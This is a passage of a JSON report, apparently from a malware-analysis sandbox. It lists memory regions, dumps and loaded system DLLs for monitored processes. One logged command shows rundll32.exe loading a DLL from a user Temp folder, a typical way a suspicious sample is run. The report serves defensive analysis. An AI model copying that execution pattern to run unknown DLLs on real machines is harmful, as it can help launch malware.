"private_0x00000000042d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 70057984, "timestamp": "00:00:27.120", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000605-addr_0x00000000042e0000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_81", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70123520, "type": "region", "version": 1 }, "end_va": 70189055, "entry_point": 0, "filename": null, "id": "region_605", "name": "private_0x00000000042e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 70123520, "timestamp": "00:00:27.121", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000606-addr_0x00000000042f0000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_82", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70189056, "type": "region", "version": 1 }, "end_va": 70254591, "entry_point": 0, "filename": null, "id": "region_606", "name": "private_0x00000000042f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 70189056, "timestamp": "00:00:27.121", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000607-addr_0x0000000004300000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_83", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70254592, "type": "region", "version": 1 }, "end_va": 70320127, "entry_point": 0, "filename": null, "id": "region_607", "name": "private_0x0000000004300000", "norm_filename": null, "region_type": "private_memory", "start_va": 70254592, "timestamp": "00:00:27.121", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000608-addr_0x0000000004310000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_84", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70320128, "type": "region", "version": 1 }, "end_va": 70385663, "entry_point": 0, "filename": null, "id": "region_608", "name": "private_0x0000000004310000", "norm_filename": null, "region_type": "private_memory", "start_va": 70320128, "timestamp": "00:00:27.122", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000609-addr_0x0000000004320000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_85", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70385664, "type": "region", "version": 1 }, "end_va": 70451199, "entry_point": 0, "filename": null, "id": "region_609", "name": "private_0x0000000004320000", "norm_filename": null, "region_type": "private_memory", "start_va": 70385664, "timestamp": "00:00:27.122", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000610-addr_0x0000000004330000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_86", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70451200, "type": "region", "version": 1 }, "end_va": 70516735, "entry_point": 0, "filename": null, "id": "region_610", "name": "private_0x0000000004330000", "norm_filename": null, "region_type": "private_memory", "start_va": 70451200, "timestamp": "00:00:27.122", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000611-addr_0x0000000004340000-size_0x0000000000010000-perm_.bin", "flags": [ "unknown" ], "info": "No dump was created for an unknown reason", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_87", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 70516736, "type": "region", "version": 1 }, "end_va": 70582271, "entry_point": 0, "filename": null, "id": "region_611", "name": "private_0x0000000004340000", "norm_filename": null, "region_type": "private_memory", "start_va": 70516736, "timestamp": "00:00:27.123", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll HOK", "filename": "c:\\windows\\system32\\rundll32.exe", "id": "proc_4", "image_name": "rundll32.exe", "monitor_reason": "child_process", "monitored_id": 4, "origin_monitor_id": 3, "ref_parent_process": { "ref_id": "proc_3", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000004-region_00000703-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_129", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_703", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:44.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_704", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:44.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_705", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:44.629", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000706-addr_0x00000000000b0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_130", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_706", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:00:44.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 9306112, "type": "region", "version": 1 }, "end_va": 9363455, "entry_point": 9306112, "filename": "\\Windows\\System32\\rundll32.exe", "id": "region_707", "name": "rundll32.exe", "norm_filename": "c:\\windows\\system32\\rundll32.exe", "region_type": "memory_mapped_file", "start_va": 9306112, "timestamp": "00:00:44.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_708", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:44.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_709", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:44.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_710", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:44.641", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000711-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_131", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_711", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:44.641", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000712-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_132", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_712", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:44.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_713", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:44.699", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1404927, "entry_point": 983040, "filename": "\\Windows\\System32\\locale.nls", "id": "region_714", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:00:44.699", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000715-addr_0x00000000001f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_133", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2097151, "entry_point": 0, "filename": null, "id": "region_715", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:44.700", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000716-addr_0x0000000000280000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_134", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_716", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:00:44.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_717", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:44.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_718", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:44.701", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_719", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:44.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_720", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:44.702", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_721", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:44.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_722", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:44.703", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 1992491008, "type": "region", "version": 1 }, "end_va": 1992663039, "entry_point": 1992491008, "filename": "\\Windows\\System32\\imagehlp.dll", "id": "region_723", "name": "imagehlp.dll", "norm_filename": "c:\\windows\\system32\\imagehlp.dll", "region_type": "memory_mapped_file", "start_va": 1992491008, "timestamp": "00:00:44.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_724", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:44.714", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_725", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:44.714", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 4489215, "entry_point": 0, "filename": null, "id": "region_726", "name": "pagefile_0x0000000000380000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3670016, "timestamp": "00:00:44.752", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_727", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:44.752", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_728", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:44.752", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_729", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:44.867", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 335871, "entry_point": 0, "filename": null, "id": "region_730", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:44.867", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 393216, "filename": "\\Windows\\System32\\en-US\\rundll32.exe.mui", "id": "region_731", "name": "rundll32.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\rundll32.exe.mui", "region_type": "memory_mapped_file", "start_va": 393216, "timestamp": "00:00:44.867", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000732-addr_0x0000000000070000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_135", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_732", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:00:44.873", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000733-addr_0x0000000000080000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_136", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 528383, "entry_point": 0, "filename": null, "id": "region_733", "name": "private_0x0000000000080000", "norm_filename": null, "region_type": "private_memory", "start_va": 524288, "timestamp": "00:00:44.873", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_734", "name": "pagefile_0x0000000000090000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 589824, "timestamp": "00:00:44.873", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_735", "name": "pagefile_0x00000000000a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 655360, "timestamp": "00:00:44.873", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 5574655, "entry_point": 0, "filename": null, "id": "region_736", "name": "pagefile_0x0000000000450000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4521984, "timestamp": "00:00:44.873", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000737-addr_0x0000000000610000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_137", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 6356992, "type": "region", "version": 1 }, "end_va": 6619135, "entry_point": 0, "filename": null, "id": "region_737", "name": "private_0x0000000000610000", "norm_filename": null, "region_type": "private_memory", "start_va": 6356992, "timestamp": "00:00:44.873", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 9371648, "type": "region", "version": 1 }, "end_va": 21954559, "entry_point": 0, "filename": null, "id": "region_738", "name": "pagefile_0x00000000008f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9371648, "timestamp": "00:00:44.873", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 548864, "start_va": 1592852480, "type": "region", "version": 1 }, "end_va": 1593401343, "entry_point": 1592852480, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll", "id": "region_739", "name": "tempdebug.dll", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\tempdebug.dll", "region_type": "memory_mapped_file", "start_va": 1592852480, "timestamp": "00:00:44.873", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_740", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:44.884", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_741", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:00:44.886", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_742", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:44.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_743", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:44.888", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_744", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:44.889", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000745-addr_0x00000000005d0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_138", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 6356991, "entry_point": 0, "filename": null, "id": "region_745", "name": "private_0x00000000005d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6094848, "timestamp": "00:00:44.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1939668992, "type": "region", "version": 1 }, "end_va": 1939931135, "entry_point": 1939710685, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_746", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1939668992, "timestamp": "00:00:44.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 6619136, "type": "region", "version": 1 }, "end_va": 7532543, "entry_point": 0, "filename": null, "id": "region_747", "name": "pagefile_0x0000000000650000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6619136, "timestamp": "00:00:44.992", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1936588800, "type": "region", "version": 1 }, "end_va": 1936666623, "entry_point": 1936596287, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_748", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1936588800, "timestamp": "00:00:44.992", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000749-addr_0x0000000000160000-size_0x0000000000003000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_139", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1454079, "entry_point": 0, "filename": null, "id": "region_749", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:00:44.993", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 2000617472, "type": "region", "version": 1 }, "end_va": 2000637951, "entry_point": 2000622648, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_750", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2000617472, "timestamp": "00:00:44.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 